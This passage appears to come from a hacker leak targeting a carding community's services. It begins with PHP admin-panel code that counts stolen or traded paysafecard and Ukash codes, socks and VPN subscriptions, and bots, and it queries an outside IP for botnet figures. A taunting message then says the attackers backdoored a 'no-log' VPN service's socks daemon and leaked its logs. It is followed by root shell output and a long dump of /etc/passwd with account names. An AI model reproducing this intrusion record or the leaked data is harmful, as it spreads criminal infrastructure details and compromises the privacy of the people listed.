SUM(wert) AS sw, COUNT(id) AS ci FROM pscs WHERE pass != '.'") or die(mysql_error()); + $arr = mysql_fetch_array($res); + echo "Es sind <b>".$arr['ci']."</b> PaysafeCards im Wert von <b>".$arr['sw']." Euro</b> in der Datenbank<br>"; + + $res = mysql_query("SELECT SUM(wert) AS sw, COUNT(id) AS ci FROM ukash") or die(mysql_error()); + $arr = mysql_fetch_array($res); + echo "Es sind <b>".$arr['ci']."</b> UkashCodes im Wert von <b>".$arr['sw']." Euro</b> in der Datenbank<br>"; + + + $res = mysql_query("SELECT SUM(credits) AS sc,COUNT(id) AS ci FROM cmuser WHERE id > 26"); + $arr = mysql_fetch_array($res); + + echo "Es sind <b>".$arr['ci']."</b> User registriert welche noch <b>".$arr['sc']." Euro</b> an Credits haben<br>"; + + // socksAcces vpnAccess + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE socksAcces > ".time(0)); + $arr = mysql_fetch_array($res); + echo " <u>Abos:</u> <b>".$arr['ci']."</b> Socks5"; + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE vpnAccess > ".time(0)); + $arr = mysql_fetch_array($res); + echo " / <b>".$arr['ci']."</b> OpenVPN<br><br>"; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM support WHERE seen = 0"); + $arr = mysql_fetch_array($res); + echo "<a style='text-decoration:none;' href='viewSupport.php'>Offene Support Tickets</a>: <b>".$arr['ci']."</b><br>"; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM vsockssupport WHERE seen = 0"); + $arr = mysql_fetch_array($res); + echo "<a style='text-decoration:none;' href='viewVsocksSupport.php'>Vicsocks Lebensanzeige</a>: <b>".$arr['ci']."</b><br><br>"; + + + $res = mysql_query("SELECT SUM(wert) AS ge FROM pscs WHERE pass = '.'"); + $arr = mysql_fetch_array($res); + $gesEarned = $arr['ge']; + $res = mysql_query("SELECT SUM(yesterday) AS ge FROM statistik"); + $arr = mysql_fetch_array($res); + $gesEarnedYes = $arr['ge']; + $res = mysql_query("SELECT SUM(db_yesterday) AS ge FROM statistik"); + $arr = mysql_fetch_array($res); + $gesEarnedDBYes = $arr['ge']; + echo "<span style='color:lime;'><b>Gesamt verdient: $gesEarned (Heute: ".($gesEarned-$gesEarnedYes)." / Gestern: ".($gesEarnedYes-$gesEarnedDBYes).")<br></b></span>"; + + $res = mysql_query("SELECT wert FROM pscs WHERE user = 'GOTT'"); + $arr = mysql_fetch_array($res); + echo "Es wurden <b style='color:red;'>".$arr['wert']." Euro</b> für VicSocks ausgegeben "; + + $earned = floatval($arr['wert']); + $res = mysql_query("SELECT yesterday, db_yesterday FROM statistik WHERE typ='vsocks'"); + $arr = mysql_fetch_array($res); + $yest = floatval($arr['yesterday']); + $db_yest = floatval($arr['db_yesterday']); + echo "(Heute: <b>".($earned-$yest)."</b> / Gestern: <b>".($yest-$db_yest)."</b>)<br>"; + + + $res = mysql_query("SELECT COUNT(id) AS ci FROM vsocksData"); + $arr = mysql_fetch_array($res); + $fp = fopen("http://77.91.225.188/asdSDAFqwe1324.php","r"); + $conN = fgets($fp,2048); + fclose($fp); + $fp = fopen("http://77.91.225.188/asdSDAFqwe13372.php","r"); + $conN2 = fgets($fp,2048); + fclose($fp); + + echo " <u>DE Bots:</u> <b>".$arr['ci']."</b> aktiv / <b>".$conN."</b> verfügbar / <b>".$conN2."</b> im Netz <br>"; + echo "<br>"; + + $res = mysql_query("SELECT wert FROM pscs WHERE user = 'GOTT2'"); + $arr = mysql_fetch_array($res); + + echo "Es wurden <b style='color:red;'>".$arr['wert']." Euro</b> im Shop ausgegeben "; + $earned = floatval($arr['wert']); + $res = mysql_query("SELECT yesterday, db_yesterday FROM statistik WHERE typ='shop'"); + $arr = mysql_fetch_array($res); + $yest = floatval($arr['yesterday']); + $db_yest = floatval($arr['db_yesterday']); + echo "(Heute: <b>".($earned-$yest)."</b> / Gestern: <b>".($yest-$db_yest)."</b>)<br>"; + + + echo "<b>Noch verfügbar:</b><br>"; + $res = mysql_query("SELECT * FROM shopLayout ORDER BY id"); + + while($arr = mysql_fetch_array($res)) + { + $res2 = mysql_query("SELECT * FROM shopWare WHERE type='".$arr['type']."' AND buyer = ''"); + $res3 = mysql_query("SELECT * FROM shopWare WHERE type='".$arr['type']."'"); + echo " <b>".mysql_num_rows($res2)."</b>/".mysql_num_rows($res3)." '".$arr['text']."'<br>"; + } + echo "<br>"; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=1 OR poll=2 OR poll=3"); + $arr = mysql_fetch_array($res); + echo "Es haben <b>".$arr['ci']."</b> User an der Umfrage teilgenommen<br>"; + echo " <u>Stimmen:</u> "; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=1");$arr = mysql_fetch_array($res); + echo "<b>".$arr['ci']."</b> Lux&Hun / "; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=2");$arr = mysql_fetch_array($res); + echo "<b>".$arr['ci']."</b> Lux&Off / "; + + $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=3");$arr = mysql_fetch_array($res); + echo "<b>".$arr['ci']."</b> Hun&Off<br>"; + + + +?> + + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| Was bieten Sie an? | +| Wir bieten 100% logfreie, sichere und absolut anonyme VPN, SSH | +| Socks und Socks 5 Zugänge in Russland. | +| | +| Wieso kann ich mir so sicher sein dass die Anonymisierung über | +| VPN24 100% logfrei und sicher ist? | +| Wir haben viele Erfahrungen gesammelt da der Service seit | +| 22.12.2009 existiert und er ein offizielles Projekt vom carders.cc| +| Team ist. Wir mieten nur Dedizierte Server bei Anbietern bei denen| +| wir auch zu 100% sicher sind dass diese nicht mit der Polizei | +| kooperieren (deswegen bieten wir als Location erstmal nur Russland| +| an, weitere Locations werden folgen). Außerdem sind die Server | +| 2-fach verschlüsselt und wie schon erwähnt komplett Logfrei. | +|____________________________________________________________________| + +Alright. So we tapped into your russian VPN- and socksserver and shat +brix when looking at your two-times encrypted server. What kind of mad +algorithm from the future are you using? No, lemme guess, AES-0? On +top of that we unfortunately had to reduce the amount of "non-logging" +to about 0% when backdooring your sockd to log http-headers; +strangely, no AES-1337 here either. This gave us a nice round-up of +the people using (and administrating) it and we can't say it was a +surprise. Therefore you find gigabytes of http- and IPlogs neatly +packed and enclosed with the backup. + +# uname -a +Linux vpnsocks 2.6.18-194.26.1.el5.028stab070.14 #1 SMP Thu Nov 18 16:34:01 MSK 2010 x86_64 GNU/Linux + +# id +uid=0(root) gid=0(root) + +# cat /etc/issue +Debian GNU/Linux 5.0 \n \l + +# cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +bind:x:101:104::/var/cache/bind:/bin/false +fetchmail:x:102:65534::/var/lib/fetchmail:/bin/false +sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin +stunnel4:x:104:106::/var/run/stunnel4:/bin/false +smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +USgK1k659d:x:1000:1000::/home/SSHUSER:/usr/sbin/nologin +vpn24socks:x:1004:1004::/home/vpn24socks:/bin/false +2ee2JLMeiD:x:1005:1005::/home/SSHUSER:/usr/sbin/nologin +jguv7VJ6ii:x:1010:1010::/home/SSHUSER:/usr/sbin/nologin +sOxNXOP2PV:x:1011:1011::/home/SSHUSER:/usr/sbin/nologin +IlE6hFCCQ9:x:1016:1016::/home/SSHUSER:/usr/sbin/nologin +gxCDRFriLl:x:1017:1017::/home/SSHUSER:/usr/sbin/nologin +BulLYDNolq:x:1018:1018::/home/SSHUSER:/usr/sbin/nologin +cEzN80h8BB:x:1020:1020::/home/SSHUSER:/usr/sbin/nologin +A49RKGrvdB:x:1021:1021::/home/SSHUSER:/usr/sbin/nologin +3uUk7DToWo:x:1022:1022::/home/SSHUSER:/usr/sbin/nologin +4MMRD3G8gT:x:1025:1025::/home/SSHUSER:/usr/sbin/nologin +QIhyvtXwum:x:1026:1026::/home/SSHUSER:/usr/sbin/nologin +bX8CG70Z8o:x:1027:1027::/home/SSHUSER:/usr/sbin/nologin +NGHZWVpVuu:x:1028:1028::/home/SSHUSER:/usr/sbin/nologin +MkdEe0NgXc:x:1029:1029::/home/SSHUSER:/usr/sbin/nologin +VP3ofYe5qa:x:1033:1033::/home/SSHUSER:/usr/sbin/nologin +s9wnq4iJbL:x:1035:1035::/home/SSHUSER:/usr/sbin/nologin +JF23IDOEX0:x:1037:1037::/home/SSHUSER:/usr/sbin/nologin +GOE9IvxCo8:x:1038:1038::/home/SSHUSER:/usr/sbin/nologin +2mAWybIfou:x:1039:1039::/home/SSHUSER:/usr/sbin/nologin +ywLRB9sQG5:x:1040:1040::/home/SSHUSER:/usr/sbin/nologin +U5wILkFczX:x:1043:1043::/home/SSHUSER:/usr/sbin/nologin +qU247MmWWp:x:1045:1045::/home/SSHUSER:/usr/sbin/nologin +JpE3P8WgBN:x:1047:1047::/home/SSHUSER:/usr/sbin/nologin +OTx2pkLemc:x:1048:1048::/home/SSHUSER:/usr/sbin/nologin +tLDp1920ug:x:1049:1049::/home/SSHUSER:/usr/sbin/nologin +pzSoTppzAu:x:1052:1052::/home/SSHUSER:/usr/sbin/nologin +fcz40nnjZr:x:1053:1053::/home/SSHUSER:/usr/sbin/nologin +1TEkAllzys:x:1054:1054::/home/SSHUSER:/usr/sbin/nologin +WMfvkEivY0:x:1055:1055::/home/SSHUSER:/usr/sbin/nologin +4Vvq0LAF9r:x:1059:1059::/home/SSHUSER:/usr/sbin/nologin +QVMgMXxSeK:x:1060:1060::/home/SSHUSER:/usr/sbin/nologin +dtxSHwZpH3:x:1061:1061::/home/SSHUSER:/usr/sbin/nologin +Uth54wPUPD:x:1062:1062::/home/SSHUSER:/usr/sbin/nologin +eCWEZEQZVq:x:1064:1064::/home/SSHUSER:/usr/sbin/nologin +wp6WkrrhkH:x:1065:1065::/home/SSHUSER:/usr/sbin/nologin +QLGAfXHUAX:x:1069:1069::/home/SSHUSER:/usr/sbin/nologin +NWPWWWxBnh:x:1070:1070::/home/SSHUSER:/usr/sbin/nologin +LY5yDIThxj:x:1071:1071::/home/SSHUSER:/usr/sbin/nologin +LvJSd7KRCq:x:1072:1072::/home/SSHUSER:/usr/sbin/nologin +DNlBW8cww2:x:1074:1074::/home/SSHUSER:/usr/sbin/nologin +22JAEReAWb:x:1075:1075::/home/SSHUSER:/usr/sbin/nologin +1U7iYfKkZg:x:1076:1076::/home/SSHUSER:/usr/sbin/nologin +A9RlGkkBly:x:1078:1078::/home/SSHUSER:/usr/sbin/nologin +ezjCz5tTLo:x:1080:1080::/home/SSHUSER:/usr/sbin/nologin +CZ298VrwyT:x:1084:1084::/home/SSHUSER:/usr/sbin/nologin +DDFFWPh13H:x:1085:1085::/home/SSHUSER:/usr/sbin/nologin +FwKPqLl9HO:x:1086:1086::/home/SSHUSER:/usr/sbin/nologin +4GA5FfwFEB:x:1090:1090::/home/SSHUSER:/usr/sbin/nologin +6RyUaunr8w:x:1091:1091::/home/SSHUSER:/usr/sbin/nologin +O2cPtoYJSA:x:1092:1092::/home/SSHUSER:/usr/sbin/nologin +OieOTeMsVT:x:1093:1093::/home/SSHUSER:/usr/sbin/nologin +nqh2PPsJoX:x:1094:1094::/home/SSHUSER:/usr/sbin/nologin +vLymjSZ2PC:x:1096:1096::/home/SSHUSER:/usr/sbin/nologin +BB22Ob0wRq:x:1097:1097::/home/SSHUSER:/usr/sbin/nologin +osHYLha9Xa:x:1100:1100::/home/SSHUSER:/usr/sbin/nologin +Mjs6t1fh7r:x:1102:1102::/home/SSHUSER:/usr/sbin/nologin +DEZtQQ9XlX:x:1104:1104::/home/SSHUSER:/usr/sbin/nologin +GIVQTfHrFc:x:1106:1106::/home/SSHUSER:/usr/sbin/nologin +6keWEVe8CF:x:1107:1107::/home/SSHUSER:/usr/sbin/nologin +f4rKlco33u:x:1109:1109::/home/SSHUSER:/usr/sbin/nologin +7iVUdiWpZI:x:1110:1110::/home/SSHUSER:/usr/sbin/nologin +WBuxr9t5xJ:x:1111:1111::/home/SSHUSER:/usr/sbin/nologin +9q9ZUnLTQd:x:1114:1114::/home/SSHUSER:/usr/sbin/nologin +Aw1GQfhx6F:x:1116:1116::/home/SSHUSER:/usr/sbin/nologin +uurtXDhjEU:x:1117:1117::/home/SSHUSER:/usr/sbin/nologin +G7lfd8zf1h:x:1119:1119::/home/SSHUSER:/usr/sbin/nologin +EMY6T7qTGu:x:1120:1120::/home/SSHUSER:/usr/sbin/nologin +IzPTVGc4Yo:x:1123:1123::/home/SSHUSER:/usr/sbin/nologin +4RmVWo7T4v:x:1126:1126::/home/SSHUSER:/usr/sbin/nologin +z9VTnI5JJX:x:1127:1127::/home/SSHUSER:/usr/sbin/nologin +qF7C1TR0he:x:1128:1128::/home/SSHUSER:/usr/sbin/nologin +OxUqFE7v5H:x:1130:1130::/home/SSHUSER:/usr/sbin/nologin +QluTWIEQSG:x:1131:1131::/home/SSHUSER:/usr/sbin/nologin +APi3yQS9Dt:x:1136:1136::/home/SSHUSER:/usr/sbin/nologin +KscYKlIxxP:x:1137:1137::/home/SSHUSER:/usr/sbin/nologin +4OrVVMvg5b:x:1138:1138::/home/SSHUSER:/usr/sbin/nologin +9q9wWck1iv:x:1139:1139::/home/SSHUSER:/usr/sbin/nologin +7T3MmDDuYA:x:1140:1140::/home/SSHUSER:/usr/sbin/nologin +9i3rSA1t3B:x:1141:1141::/home/SSHUSER:/usr/sbin/nologin +OG60AiIy32:x:1142:1142::/home/SSHUSER:/usr/sbin/nologin +XQlGb5EDEX:x:1143:1143::/home/SSHUSER:/usr/sbin/nologin +gSPbDrdVM7:x:1146:1146::/home/SSHUSER:/usr/sbin/nologin +bn1XjaAbBO:x:1148:1148::/home/SSHUSER:/usr/sbin/nologin +eEAGLP58B1:x:1149:1149::/home/SSHUSER:/usr/sbin/nologin +19vuUOl1DA:x:1151:1151::/home/SSHUSER:/usr/sbin/nologin +GJTBqAX0Po:x:1153:1153::/home/SSHUSER:/usr/sbin/nologin +YlKhbzOzlW:x:1155:1155::/home/SSHUSER:/usr/sbin/nologin +P1IEuRFxoc:x:1157:1157::/home/SSHUSER:/usr/sbin/nologin +M74tz0c6cB:x:1159:1159::/home/SSHUSER:/usr/sbin/nologin +pxCR5mWYxl:x:1160:1160::/home/SSHUSER:/usr/sbin/nologin +BYBEFkGPOv:x:1161:1161::/home/SSHUSER:/usr/sbin/nologin +bLQLndsfG7:x:1162:1162::/home/SSHUSER:/usr/sbin/nologin +7RsRZ2UUu4:x:1163:1163::/home/SSHUSER:/usr/sbin/nologin +gbWPMY3QUz:x:1164:1164::/home/SSHUSER:/usr/sbin/nologin +3DPSaYAK0I:x:1165:1165::/home/SSHUSER:/usr/sbin/nologin +Mfa9YHsFwm:x:1167:1167::/home/SSHUSER:/usr/sbin/nologin +MCdvro0waF:x:1168:1168::/home/SSHUSER:/usr/sbin/nologin +4qTipZxa3g:x:1169:1169::/home/SSHUSER:/usr/sbin/nologin +jzJtLApQhG:x:1174:1174::/home/SSHUSER:/usr/sbin/nologin +MfJ1grnWz2:x:1176:1176::/home/SSHUSER:/usr/sbin/nologin +TKTlaudWc6:x:1178:1178::/home/SSHUSER:/usr/sbin/nologin +Pg6UVUT4Zi:x:1179:1179::/home/SSHUSER:/usr/sbin/nologin +7KxfsATvUY:x:1180:1180::/home/SSHUSER:/usr/sbin/nologin +1YzAOqKyJU:x:1181:1181::/home/SSHUSER:/usr/sbin/nologin +ArAdFXiTdV:x:1182:1182::/home/SSHUSER:/usr/sbin/nologin +Tyt6Mxbjb9:x:1183:1183::/home/SSHUSER:/usr/sbin/nologin +p5TdBxcMOd:x:1185:1185::/home/SSHUSER:/usr/sbin/nologin +HCj78QJ6bB:x:1186:1186::/home/SSHUSER:/usr/sbin/nologin +ataiqUNkhi:x:1187:1187::/home/SSHUSER:/usr/sbin/nologin +BDnc11BaRR:x:1189:1189::/home/SSHUSER:/usr/sbin/nologin +0xs05pGnsc:x:1192:1192::/home/SSHUSER:/usr/sbin/nologin +6lCpT6Rtlb:x:1193:1193::/home/SSHUSER:/usr/sbin/nologin +MZGuvPmcQQ:x:1194:1194::/home/SSHUSER:/usr/sbin/nologin +S393KhVsS0:x:1195:1195::/home/SSHUSER:/usr/sbin/nologin +hePPBhA3Zb:x:1196:1196::/home/SSHUSER:/usr/sbin/nologin +xU33BmPZBt:x:1198:1198::/home/SSHUSER:/usr/sbin/nologin +8kTCqMWNer:x:1199:1199::/home/SSHUSER:/usr/sbin/nologin +Z9mwX94DwA:x:1203:1203::/home/SSHUSER:/usr/sbin/nologin +QE70dT7Sk6:x:1207:1207::/home/SSHUSER:/usr/sbin/nologin +3nRGuwyy3O:x:1208:1208::/home/SSHUSER:/usr/sbin/nologin +7lHu9x5ahz:x:1209:1209::/home/SSHUSER:/usr/sbin/nologin +yQt4twcYHi:x:1210:1210::/home/SSHUSER:/usr/sbin/nologin +5QOvATUZRp:x:1211:1211::/home/SSHUSER:/usr/sbin/nologin +qrIJmTNsip:x:1213:1213::/home/SSHUSER:/usr/sbin/nologin +3MD6MyTcBm:x:1214:1214::/home/SSHUSER:/usr/sbin/nologin +tX55vN8iBA:x:1216:1216::/home/SSHUSER:/usr/sbin/nologin +MUF31iM1WD:x:1218:1218::/home/SSHUSER:/usr/sbin/nologin +6I1FTys1aV:x:1219:1219::/home/SSHUSER:/usr/sbin/nologin +wH5nC1icK0:x:1222:1222::/home/SSHUSER:/usr/sbin/nologin +z9GYUjVR9T:x:1224:1224::/home/SSHUSER:/usr/sbin/nologin +uiv8RD7GCm:x:1225:1225::/home/SSHUSER:/usr/sbin/nologin +debug:x:1227:1227::/home/SSHUSER:/usr/sbin/nologin +udewQStk6R:x:1229:1229::/home/SSHUSER:/usr/sbin/nologin +YRfpne3P1W:x:1231:1231::/home/SSHUSER:/usr/sbin/nologin +2G6ixqigXX:x:1232:1232::/home/SSHUSER:/usr/sbin/nologin +FZ6nGPBlnq:x:1234:1234::/home/SSHUSER:/usr/sbin/nologin +N4WUxGoeHX:x:1235:1235::/home/SSHUSER:/usr/sbin/nologin +3qoY48h6od:x:1236:1236::/home/SSHUSER:/usr/sbin/nologin +0KltTgDdxs:x:1237:1237::/home/SSHUSER:/usr/sbin/nologin +KnOIZkAYhv:x:1239:1239::/home/SSHUSER:/usr/sbin/nologin +pduruQrvQw:x:1240:1240::/home/SSHUSER:/usr/sbin/nologin +gfPh6U7BSL:x:1244:1244::/home/SSHUSER:/usr/sbin/nologin +5d4PClWw9W:x:1246:1246::/home/SSHUSER:/usr/sbin/nologin +X3IwwuMhVn:x:1247:1247::/home/SSHUSER:/usr/sbin/nologin +9lKRF8UVul:x:1250:1250::/home/SSHUSER:/usr/sbin/nologin +7OEkZFXfrj:x:1251:1251::/home/SSHUSER:/usr/sbin/nologin +XR9kXMus18:x:1252:1252::/home/SSHUSER:/usr/sbin/nologin +LeJdtNDj0s:x:1253:1253::/home/SSHUSER:/usr/sbin/nologin +sMdDwKbykL:x:1255:1255::/home/SSHUSER:/usr/sbin/nologin +RLPQ9lCkkg:x:1257:1257::/home/SSHUSER:/usr/sbin/nologin +m07JSN8S1t:x:1258:1258::/home/SSHUSER:/usr/sbin/nologin +KoW5ucmliR:x:1259:1259::/home/SSHUSER:/usr/sbin/nologin +vxaNuWuV5A:x:1260:1260::/home/SSHUSER:/usr/sbin/nologin +r6cQANOWcM:x:1261:1261::/home/SSHUSER:/usr/sbin/nologin +GefhxHzMLB:x:1264:1264::/home/SSHUSER:/usr/sbin/nologin +gghzgxMlzK:x:1265:1265::/home/SSHUSER:/usr/sbin/nologin +dTECuvvcnY:x:1267:1267::/home/SSHUSER:/usr/sbin/nologin +teamsocks:x:1268:1268::/home/SSHUSER:/usr/sbin/nologin +2ZzW1TPwek:x:1273:1273::/home/SSHUSER:/usr/sbin/nologin +98pASZD7ZL:x:1274:1274::/home/SSHUSER:/usr/sbin/nologin +rgNCfMxMDE:x:1276:1276::/home/SSHUSER:/usr/sbin/nologin +TPJNO6U7gB:x:1278:1278::/home/SSHUSER:/usr/sbin/nologin +ZfQAMBcfd9:x:1280:1280::/home/SSHUSER:/usr/sbin/nologin +DWJLuNgRHq:x:1281:1281::/home/SSHUSER:/usr/sbin/nologin +26PWTAtsMQ:x:1282:1282::/home/SSHUSER:/usr/sbin/nologin +wiDxLyK5di:x:1283:1283::/home/SSHUSER:/usr/sbin/nologin +OOueJqB7Ux:x:1285:1285::/home/SSHUSER:/usr/sbin/nologin +EaDZkcpMhf:x:1286:1286::/home/SSHUSER:/usr/sbin/nologin +swj3AHcyct:x:1287:1287::/home/SSHUSER:/usr/sbin/nologin +tf1x5jgZf7:x:1289:1289::/home/SSHUSER:/usr/sbin/nologin +fTkJjFodJR:x:1290:1290::/home/SSHUSER:/usr/sbin/nologin +q8Ospeoqjm:x:1292:1292::/home/SSHUSER:/usr/sbin/nologin +atIdo8CMgl:x:1293:1293::/home/SSHUSER:/usr/sbin/nologin +AIVtIPpwbI:x:1294:1294::/home/SSHUSER:/usr/sbin/nologin +83ssqOi2mG:x:1295:1295::/home/SSHUSER:/usr/sbin/nologin +mDhIWzTPpL:x:1297:1297::/home/SSHUSER:/usr/sbin/nologin +aw1h0yzOXG:x:1300:1300::/home/SSHUSER:/usr/sbin/nologin +8aXdZvgEAL:x:1301:1301::/home/SSHUSER:/usr/sbin/nologin +7DpjZkkKRH:x:1303:1303::/home/SSHUSER:/usr/sbin/nologin +AA4KnP2gQo:x:1305:1305::/home/SSHUSER:/usr/sbin/nologin +OdJUE9NXz0:x:1306:1306::/home/SSHUSER:/usr/sbin/nologin +WRwA7CA595:x:1307:1307::/home/SSHUSER:/usr/sbin/nologin +UHJXsI3u7T:x:1309:1309::/home/SSHUSER:/usr/sbin/nologin +AfPMi3Orqx:x:1310:1310::/home/SSHUSER:/usr/sbin/nologin +IIpk9TW4Hy:x:1313:1313::/home/SSHUSER:/usr/sbin/nologin +GfXK6QYZvV:x:1314:1314::/home/SSHUSER:/usr/sbin/nologin +O2JLXab4Qb:x:1315:1315::/home/SSHUSER:/usr/sbin/nologin +abobJxNBqT:x:1317:1317::/home/SSHUSER:/usr/sbin/nologin +PAZYQvYMzp:x:1318:1318::/home/SSHUSER:/usr/sbin/nologin +mein:x:1322:1322::/home/SSHUSER:/usr/sbin/nologin +In1AVHseTI:x:1323:1323::/home/SSHUSER:/usr/sbin/nologin +1yNGl2LCqo:x:1324:1324::/home/SSHUSER:/usr/sbin/nologin +UcblLYHagd:x:1325:1325::/home/SSHUSER:/usr/sbin/nologin +GXFmqv0v6j:x:1327:1327::/home/SSHUSER:/usr/sbin/nologin +eb0MkURFMR:x:1328:1328::/home/SSHUSER:/usr/sbin/nologin +ZF0P5R5HY1:x:1329:1329::/home/SSHUSER:/usr/sbin/nologin +raiesY1Uya:x:1330:1330::/home/SSHUSER:/usr/sbin/nologin +6vWXOICD5H:x:1331:1331::/home/SSHUSER:/usr/sbin/nologin +EHgdxvxbz6:x:1332:1332::/home/SSHUSER:/usr/sbin/nologin +A9cAJOMNCY:x:1333:1333::/home/SSHUSER:/usr/sbin/nologin +tHx7Nh5Kfp:x:1335:1335::/home/SSHUSER:/usr/sbin/nologin +cvs7ZHnMch:x:1336:1336::/home/SSHUSER:/usr/sbin/nologin +R2XHmC62ZS:x:1337:1337::/home/SSHUSER:/usr/sbin/nologin +OthdQ1Nmh5:x:1338:1338::/home/SSHUSER:/usr/sbin/nologin +bhUizLPv0M:x:1339:1339::/home/SSHUSER:/usr/sbin/nologin +FqBNIU3BXX:x:1340:1340::/home/SSHUSER:/usr/sbin/nologin +cYuowtqfqp:x:1341:1341::/home/SSHUSER:/usr/sbin/nologin +ohLtOJoye9:x:1342:1342::/home/SSHUSER:/usr/sbin/nologin +0xlfaHuCkh:x:1343:1343::/home/SSHUSER:/usr/sbin/nologin +9oaRxjmjhy:x:1346:1346::/home/SSHUSER:/usr/sbin/nologin +8YNxD3ah6D:x:1347:1347::/home/SSHUSER:/usr/sbin/nologin +vd8oJtJgZr:x:1350:1350::/home/SSHUSER:/usr/sbin/nologin +NwIUjcCYZG:x:1351:1351::/home/SSHUSER:/usr/sbin/nologin +4nduuzyTQx:x:1352:1352::/home/SSHUSER:/usr/sbin/nologin +9qAqHLtLBx:x:1353:1353::/home/SSHUSER:/usr/sbin/nologin +tuy9erQgxJ:x:1354:1354::/home/SSHUSER:/usr/sbin/nologin +GMunVltQvi:x:1356:1356::/home/SSHUSER:/usr/sbin/nologin +sqYWjLaKXf:x:1357:1357::/home/SSHUSER:/usr/sbin/nologin +ymLHzXSVjD:x:1358:1358::/home/SSHUSER:/usr/sbin/nologin +cG6fOsmfgT:x:1359:1359::/home/SSHUSER:/usr/sbin/nologin +Xv02xz1TQc:x:1360:1360::/home/SSHUSER:/usr/sbin/nologin +13rRlbMsXc:x:1361:1361::/home/SSHUSER:/usr/sbin/nologin +o1NbEhdi1P:x:1362:1362::/home/SSHUSER:/usr/sbin/nologin +SvOn61Ck0K:x:1364:1364::/home/SSHUSER:/usr/sbin/nologin +LykwDkKp22:x:1365:1365::/home/SSHUSER:/usr/sbin/nologin +gDFHnIx6gq:x:1366:1366::/home/SSHUSER:/usr/sbin/nologin +BQBra5cl9R:x:1367:1367::/home/SSHUSER:/usr/sbin/nologin +4DaHNYAOXR:x:1368:1368::/home/SSHUSER:/usr/sbin/nologin +mybkiYHe4L:x:1369:1369::/home/SSHUSER:/usr/sbin/nologin +EZPpg2A55v:x:1370:1370::/home/SSHUSER:/usr/sbin/nologin +ZtLdtMOxjz:x:1371:1371::/home/SSHUSER:/usr/sbin/nologin +zyDY1v3Ifs:x:1372:1372::/home/SSHUSER:/usr/sbin/nologin +vk9rnSCr7X:x:1373:1373::/home/SSHUSER:/usr/sbin/nologin +nBeRUhO19Z:x:1374:1374::/home/SSHUSER:/usr/sbin/nologin +TeXbvEj3oJ:x:1375:1375::/home/SSHUSER:/usr/sbin/nologin +2Fr6Xq4WyM:x:1377:1377::/home/SSHUSER:/usr/sbin/nologin +yZsxPqnHdR:x:1378:1378::/home/SSHUSER:/usr/sbin/nologin +uQ4lOfB4g0:x:1379:1379::/home/SSHUSER:/usr/sbin/nologin +tMOYcIGsBO:x:1380:1380::/home/SSHUSER:/usr/sbin/nologin +rbcBkgkMCF:x:1381:1381::/home/SSHUSER:/usr/sbin/nologin +r0FjhxSADo:x:1382:1382::/home/SSHUSER:/usr/sbin/nologin +88rM31v2oJ:x:1383:1383::/home/SSHUSER:/usr/sbin/nologin +d3rdsSAt5s:x:1385:1385::/home/SSHUSER:/usr/sbin/nologin +frpOFX7CGJ:x:1386:1386::/home/SSHUSER:/usr/sbin/nologin +DN4SdAwDUX:x:1387:1387::/home/SSHUSER:/usr/sbin/nologin +SWsT6SYBW0:x:1388:1388::/home/SSHUSER:/usr/sbin/nologin +mqdlYki3Bu:x:1390:1390::/home/SSHUSER:/usr/sbin/nologin +Kf6hkNRFbt:x:1391:1391::/home/SSHUSER:/usr/sbin/nologin +VRKabwxsRz:x:1392:1392::/home/SSHUSER:/usr/sbin/nologin +W149pluZd9:x:1393:1393::/home/SSHUSER:/usr/sbin/nologin +UzPuS4CkgJ:x:1394:1394::/home/SSHUSER:/usr/sbin/nologin +UsGU5GLZmf:x:1395:1395::/home/SSHUSER:/usr/sbin/nologin +r4xLEdMjeu:x:1396:1396::/home/SSHUSER:/usr/sbin/nologin +lutZaKA8pP:x:1397:1397::/home/SSHUSER:/usr/sbin/nologin +usDgH6KNsm:x:1398:1398::/home/SSHUSER:/usr/sbin/nologin +CMSc3fnm0o:x:1399:1399::/home/SSHUSER:/usr/sbin/nologin +vYwuL6Uwia:x:1400:1400::/home/SSHUSER:/usr/sbin/nologin +yaSgVmndrd:x:1403:1403::/home/SSHUSER:/usr/sbin/nologin +dfvW2pna2L:x:1404:1404::/home/SSHUSER:/usr/sbin/nologin +ng3LKLliu1:x:1405:1405::/home/SSHUSER:/usr/sbin/nologin +8SVb2iLNbA:x:1406:1406::/home/SSHUSER:/usr/sbin/nologin +3aiHc3W1co:x:1407:1407::/home/SSHUSER:/usr/sbin/nologin +mON9q5Awho:x:1408:1408::/home/SSHUSER:/usr/sbin/nologin +FRXf5cUHNA:x:1409:1409::/home/SSHUSER:/usr/sbin/nologin +X2w1wWC8cc:x:1410:1410::/home/SSHUSER:/usr/sbin/nologin 